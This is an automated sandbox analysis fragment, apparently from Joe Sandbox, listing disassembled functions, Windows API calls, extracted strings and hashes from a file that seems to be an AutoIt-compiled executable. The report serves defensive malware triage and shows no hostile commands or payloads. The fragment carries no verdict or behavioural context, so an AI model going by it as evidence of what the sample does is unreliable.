                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: _wcslen$MessageSend$BuffCharUpper
                                        • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                        • API String ID: 1103490817-4258414348
                                        • Opcode ID: 6edc77b18691a0fdf03883ecf0029c4ae851c815ad6c06a9c368c6b3e6341006
                                        • Instruction ID: 298361c36d754575df81ea034e8c5c9828aa651f12acd9497d7f36336bd3e614
                                        • Opcode Fuzzy Hash: 6edc77b18691a0fdf03883ecf0029c4ae851c815ad6c06a9c368c6b3e6341006
                                        • Instruction Fuzzy Hash: F5E1D9352087018FCB15EF24C450A6AB7E2BF98314F11895DF8DAAB3A2DB71ED45CB91
                                        Function 000FC998 Relevance: 30.0, APIs: 7, Strings: 10, Instructions: 242COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: _wcslen$BuffCharUpper
                                        • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                        • API String ID: 1256254125-909552448
                                        • Opcode ID: f6ad5533c7cadc4f4d679322431bc1f317ffb2e690ad349007b52b76636f329e
                                        • Instruction ID: 0b3c0b965cb7c9bec06d20ee79e9ae216629e2919a185a79dd58fb06f9e7b291
                                        • Opcode Fuzzy Hash: f6ad5533c7cadc4f4d679322431bc1f317ffb2e690ad349007b52b76636f329e
                                        • Instruction Fuzzy Hash: 8471143260012E8BEB20DE38CB43DFE33D1ABA0754F250524FA56A7685EB31DD45E3A1
                                        Function 0010833C Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 196windowlibraryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • _wcslen.LIBCMT ref: 0010835A
                                        • _wcslen.LIBCMT ref: 0010836E
                                        • _wcslen.LIBCMT ref: 00108391
                                        • _wcslen.LIBCMT ref: 001083B4
                                        • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 001083F2
                                        • LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,0010361A,?), ref: 0010844E
                                        • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00108487
                                        • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 001084CA
                                        • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00108501
                                        • FreeLibrary.KERNEL32(?), ref: 0010850D
                                        • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0010851D
                                        • DestroyIcon.USER32(?), ref: 0010852C
                                        • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00108549
                                        • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00108555
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
                                        • String ID: .dll$.exe$.icl
                                        • API String ID: 799131459-1154884017
                                        • Opcode ID: 96a359d9628b47805518ed6ec576334e713c2fbc8b62d172af657ede908979a0
                                        • Instruction ID: a9325b768bbc477479c305b816ef4393421c2ff0ec7ba5e0ff74df5c78c5ba1d
                                        • Opcode Fuzzy Hash: 96a359d9628b47805518ed6ec576334e713c2fbc8b62d172af657ede908979a0
                                        • Instruction Fuzzy Hash: 1261DF71904219BAEB14DF64CC81FFE77A8BB04B21F104619F895D61D2DFB4A980DBA0
                                        Function 00077778 Relevance: 28.3, APIs: 1, Strings: 15, Instructions: 273COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                        • API String ID: 0-1645009161
                                        • Opcode ID: 983216e70ae0ca9cd761269db6f71b7aaaf57b2fb27e3256bf7786de16b40226
                                        • Instruction ID: d60abf12fd16500178c836ff7fb436ef72433483c950f9ca37f1c1c3719ea9d6
                                        • Opcode Fuzzy Hash: 983216e70ae0ca9cd761269db6f71b7aaaf57b2fb27e3256bf7786de16b40226
                                        • Instruction Fuzzy Hash: 3C811871A48205BBDB25AF64CC42FEE37A8AF15340F04C464F90CAB193EBB8D911D7A5
                                        Function 000D5A1B Relevance: 27.2, APIs: 18, Instructions: 198windowtimeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • LoadIconW.USER32(00000063), ref: 000D5A2E
                                        • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 000D5A40
                                        • SetWindowTextW.USER32(?,?), ref: 000D5A57
                                        • GetDlgItem.USER32(?,000003EA), ref: 000D5A6C
                                        • SetWindowTextW.USER32(00000000,?), ref: 000D5A72
                                        • GetDlgItem.USER32(?,000003E9), ref: 000D5A82
                                        • SetWindowTextW.USER32(00000000,?), ref: 000D5A88
                                        • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 000D5AA9
                                        • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 000D5AC3
                                        • GetWindowRect.USER32(?,?), ref: 000D5ACC
                                        • _wcslen.LIBCMT ref: 000D5B33
                                        • SetWindowTextW.USER32(?,?), ref: 000D5B6F
                                        • GetDesktopWindow.USER32 ref: 000D5B75
                                        • GetWindowRect.USER32(00000000), ref: 000D5B7C
                                        • MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 000D5BD3
                                        • GetClientRect.USER32(?,?), ref: 000D5BE0
                                        • PostMessageW.USER32(?,00000005,00000000,?), ref: 000D5C05
                                        • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 000D5C2F
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
                                        • String ID:
                                        • API String ID: 895679908-0
                                        • Opcode ID: 6600c98c17b28291a635fa762f47f072b4f9d606ab35add6a58861cb4a0aa374
                                        • Instruction ID: c50933503e1ac17de7fa17dc6e9f39bcb8c51240125e5c8d1de6f020c9a0ac40
                                        • Opcode Fuzzy Hash: 6600c98c17b28291a635fa762f47f072b4f9d606ab35add6a58861cb4a0aa374
                                        • Instruction Fuzzy Hash: D7716131900B05AFDB20DFA8CE45AAEBBF5FF48715F10461AE582A36A0D775E944CF60
                                        Function 000EFE0E Relevance: 27.1, APIs: 18, Instructions: 128COMMON
                                        Download Yara Rule
                                        APIs
                                        • LoadCursorW.USER32(00000000,00007F89), ref: 000EFE27
                                        • LoadCursorW.USER32(00000000,00007F8A), ref: 000EFE32
                                        • LoadCursorW.USER32(00000000,00007F00), ref: 000EFE3D
                                        • LoadCursorW.USER32(00000000,00007F03), ref: 000EFE48
                                        • LoadCursorW.USER32(00000000,00007F8B), ref: 000EFE53
                                        • LoadCursorW.USER32(00000000,00007F01), ref: 000EFE5E
                                        • LoadCursorW.USER32(00000000,00007F81), ref: 000EFE69
                                        • LoadCursorW.USER32(00000000,00007F88), ref: 000EFE74
                                        • LoadCursorW.USER32(00000000,00007F80), ref: 000EFE7F
                                        • LoadCursorW.USER32(00000000,00007F86), ref: 000EFE8A
                                        • LoadCursorW.USER32(00000000,00007F83), ref: 000EFE95
                                        • LoadCursorW.USER32(00000000,00007F85), ref: 000EFEA0
                                        • LoadCursorW.USER32(00000000,00007F82), ref: 000EFEAB
                                        • LoadCursorW.USER32(00000000,00007F84), ref: 000EFEB6
                                        • LoadCursorW.USER32(00000000,00007F04), ref: 000EFEC1
                                        • LoadCursorW.USER32(00000000,00007F02), ref: 000EFECC
                                        • GetCursorInfo.USER32(?), ref: 000EFEDC
                                        • GetLastError.KERNEL32 ref: 000EFF1E
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Cursor$Load$ErrorInfoLast
                                        • String ID:
                                        • API String ID: 3215588206-0
                                        • Opcode ID: 0893736698130343335e268f84fa380276e645a138c0c22e0ad3075000e101b2
                                        • Instruction ID: 76925dd6302eb74bcff1161c4735e54275c2ea3aa77e6b03d662cfc328975bdb
                                        • Opcode Fuzzy Hash: 0893736698130343335e268f84fa380276e645a138c0c22e0ad3075000e101b2
                                        • Instruction Fuzzy Hash: 4A4153B0D0535A6EDB109FBA8C8586EBFE8FF04354B50853AE11DE7281DB789901CE91
                                        Function 000900C6 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 81COMMON
                                        Download Yara Rule
                                        APIs
                                        • __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 000900C6
                                          • Part of subcall function 000900ED: InitializeCriticalSectionAndSpinCount.KERNEL32(0014070C,00000FA0,7C14CC77,?,?,?,?,000B23B3,000000FF), ref: 0009011C
                                          • Part of subcall function 000900ED: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,000B23B3,000000FF), ref: 00090127
                                          • Part of subcall function 000900ED: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,000B23B3,000000FF), ref: 00090138
                                          • Part of subcall function 000900ED: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 0009014E
                                          • Part of subcall function 000900ED: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 0009015C
                                          • Part of subcall function 000900ED: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 0009016A
                                          • Part of subcall function 000900ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00090195
                                          • Part of subcall function 000900ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 000901A0
                                        • ___scrt_fastfail.LIBCMT ref: 000900E7
                                          • Part of subcall function 000900A3: __onexit.LIBCMT ref: 000900A9
                                        Strings
                                        • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00090122
                                        • SleepConditionVariableCS, xrefs: 00090154
                                        • WakeAllConditionVariable, xrefs: 00090162
                                        • InitializeConditionVariable, xrefs: 00090148
                                        • kernel32.dll, xrefs: 00090133
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
                                        • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                        • API String ID: 66158676-1714406822
                                        • Opcode ID: 85b8b1aa36cfa48a0ee9c2e1a01f520609aab9e30bcd2ce4ff38179df412b1fe
                                        • Instruction ID: e4834a32c8555913d2a3e876bfe225d05542ae5597ebcb031670fcc5973fb0a1
                                        • Opcode Fuzzy Hash: 85b8b1aa36cfa48a0ee9c2e1a01f520609aab9e30bcd2ce4ff38179df412b1fe
                                        • Instruction Fuzzy Hash: F921FC32645711AFDB215BB4AC0AB6A37D4EB49F51F00012AF981A6AD1DBB058409B91
                                        Function 000D30F7 Relevance: 24.9, APIs: 8, Strings: 6, Instructions: 400COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: _wcslen
                                        • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                        • API String ID: 176396367-1603158881
                                        • Opcode ID: 5d5e0afe0387a18c888814eddec924aacb05720b046b867ca9d55c721f7240de
                                        • Instruction ID: 218acaf533ddcf927fc3be44c6fe7d3e5fc51000254eaa805dcc2ac48be6eaf4
                                        • Opcode Fuzzy Hash: 5d5e0afe0387a18c888814eddec924aacb05720b046b867ca9d55c721f7240de
                                        • Instruction Fuzzy Hash: 7BE1E232A00616ABCB689F68C451AEEFBB1BF44710F14811AE456B7341DB30AF859BB1
                                        Function 000E44C0 Relevance: 24.8, APIs: 7, Strings: 7, Instructions: 309COMMON
                                        Download Yara Rule
                                        APIs
                                        • CharLowerBuffW.USER32(00000000,00000000,0010CC08), ref: 000E4527
                                        • _wcslen.LIBCMT ref: 000E453B
                                        • _wcslen.LIBCMT ref: 000E4599
                                        • _wcslen.LIBCMT ref: 000E45F4
                                        • _wcslen.LIBCMT ref: 000E463F
                                        • _wcslen.LIBCMT ref: 000E46A7
                                          • Part of subcall function 0008F9F2: _wcslen.LIBCMT ref: 0008F9FD
                                        • GetDriveTypeW.KERNEL32(?,00136BF0,00000061), ref: 000E4743
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: _wcslen$BuffCharDriveLowerType
                                        • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                        • API String ID: 2055661098-1000479233
                                        • Opcode ID: 13ebb9fc24a44c29d8bbbbc1bf65b646dd3f28f456d34da7e0d6fd4b8b94b560
                                        • Instruction ID: 6d7236ae545046a7e0537b66b133019461ac275e9d686a1765e9cae9539e209e
                                        • Opcode Fuzzy Hash: 13ebb9fc24a44c29d8bbbbc1bf65b646dd3f28f456d34da7e0d6fd4b8b94b560
                                        • Instruction Fuzzy Hash: F9B11631A083429FC710DF29C890A7EB7E5BFA5760F50891DF49AE7292D730D945CB92
                                        Function 000FAFF9 Relevance: 24.4, APIs: 16, Instructions: 418processCOMMON
                                        Download Yara Rule
                                        APIs
                                        • _wcslen.LIBCMT ref: 000FB198
                                        • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 000FB1B0
                                        • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 000FB1D4
                                        • _wcslen.LIBCMT ref: 000FB200
                                        • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 000FB214
                                        • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 000FB236
                                        • _wcslen.LIBCMT ref: 000FB332
                                          • Part of subcall function 000E05A7: GetStdHandle.KERNEL32(000000F6), ref: 000E05C6
                                        • _wcslen.LIBCMT ref: 000FB34B
                                        • _wcslen.LIBCMT ref: 000FB366
                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 000FB3B6
                                        • GetLastError.KERNEL32(00000000), ref: 000FB407
                                        • CloseHandle.KERNEL32(?), ref: 000FB439
                                        • CloseHandle.KERNEL32(00000000), ref: 000FB44A
                                        • CloseHandle.KERNEL32(00000000), ref: 000FB45C
                                        • CloseHandle.KERNEL32(00000000), ref: 000FB46E
                                        • CloseHandle.KERNEL32(?), ref: 000FB4E3
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
                                        • String ID:
                                        • API String ID: 2178637699-0
                                        • Opcode ID: 73574cd17659a8070dca558c0e5ab151d5abee87980cfc61f218ad070dd5c8e5
                                        • Instruction ID: ed281a4457acde48fa0d3579417d328a1e16a3eed44eb3e0372129828a3346ca
                                        • Opcode Fuzzy Hash: 73574cd17659a8070dca558c0e5ab151d5abee87980cfc61f218ad070dd5c8e5
                                        • Instruction Fuzzy Hash: 81F189316082049FCB64EF24C881BAEBBE1AF85314F14855DF9899B2A2CB71EC40DF52
                                        Function 0007326F Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 214windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetMenuItemCount.USER32(00141990), ref: 000B2F8D
                                        • GetMenuItemCount.USER32(00141990), ref: 000B303D
                                        • GetCursorPos.USER32(?), ref: 000B3081
                                        • SetForegroundWindow.USER32(00000000), ref: 000B308A
                                        • TrackPopupMenuEx.USER32(00141990,00000000,?,00000000,00000000,00000000), ref: 000B309D
                                        • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 000B30A9
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
                                        • String ID: 0
                                        • API String ID: 36266755-4108050209
                                        • Opcode ID: 4fcce91a951e96dd84afaec7fb4c9dda3a992efe36ba0b3ea50d80daca863692
                                        • Instruction ID: 3cb857d5be420f6ed5a8071bc75c09802669b9f0a84a18e3041b4a91d51bdc56
                                        • Opcode Fuzzy Hash: 4fcce91a951e96dd84afaec7fb4c9dda3a992efe36ba0b3ea50d80daca863692
                                        • Instruction Fuzzy Hash: 9271C670640206BAFB359F65CC49FEABFA4FF05364F204226F528661E1C7B1AD50DB94
                                        Function 00106CD9 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 194windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • DestroyWindow.USER32(?,?), ref: 00106DEB
                                          • Part of subcall function 00076B57: _wcslen.LIBCMT ref: 00076B6A
                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00106E5F
                                        • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00106E81
                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00106E94
                                        • DestroyWindow.USER32(?), ref: 00106EB5
                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00070000,00000000), ref: 00106EE4
                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00106EFD
                                        • GetDesktopWindow.USER32 ref: 00106F16
                                        • GetWindowRect.USER32(00000000), ref: 00106F1D
                                        • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00106F35
                                        • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00106F4D
                                          • Part of subcall function 00089944: GetWindowLongW.USER32(?,000000EB), ref: 00089952
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
                                        • String ID: 0$tooltips_class32
                                        • API String ID: 2429346358-3619404913
                                        • Opcode ID: 4f89a94bf055b807eadae66958cf87a777e1bb002d496c68c7e1a0e0524bf9b6
                                        • Instruction ID: e252b44b384dbfa63fb4561827312df801fe1d4af4764a0cad31c2b44bd234aa
                                        • Opcode Fuzzy Hash: 4f89a94bf055b807eadae66958cf87a777e1bb002d496c68c7e1a0e0524bf9b6
                                        • Instruction Fuzzy Hash: 99717674104345AFDB21CF18DC54EAABBE9FB89304F04091DFAC9872A1CBB1A996CF51
                                        Function 0010911E Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 181windowfileCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00089BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00089BB2
                                        • DragQueryPoint.SHELL32(?,?), ref: 00109147
                                          • Part of subcall function 00107674: ClientToScreen.USER32(?,?), ref: 0010769A
                                          • Part of subcall function 00107674: GetWindowRect.USER32(?,?), ref: 00107710
                                          • Part of subcall function 00107674: PtInRect.USER32(?,?,00108B89), ref: 00107720
                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 001091B0
                                        • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 001091BB
                                        • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 001091DE
                                        • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00109225
                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 0010923E
                                        • SendMessageW.USER32(?,000000B1,?,?), ref: 00109255
                                        • SendMessageW.USER32(?,000000B1,?,?), ref: 00109277
                                        • DragFinish.SHELL32(?), ref: 0010927E
                                        • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00109371
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
                                        • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                        • API String ID: 221274066-3440237614
                                        • Opcode ID: 0521f3ac5cb80ec55be09ce7cfdc23f362b98499109d2f535d57de57baea1e42
                                        • Instruction ID: 28153b7a1b3ab18eaab7e49bb6fd5cf236542a5b48930d727ff89e8d4f0f9379
                                        • Opcode Fuzzy Hash: 0521f3ac5cb80ec55be09ce7cfdc23f362b98499109d2f535d57de57baea1e42
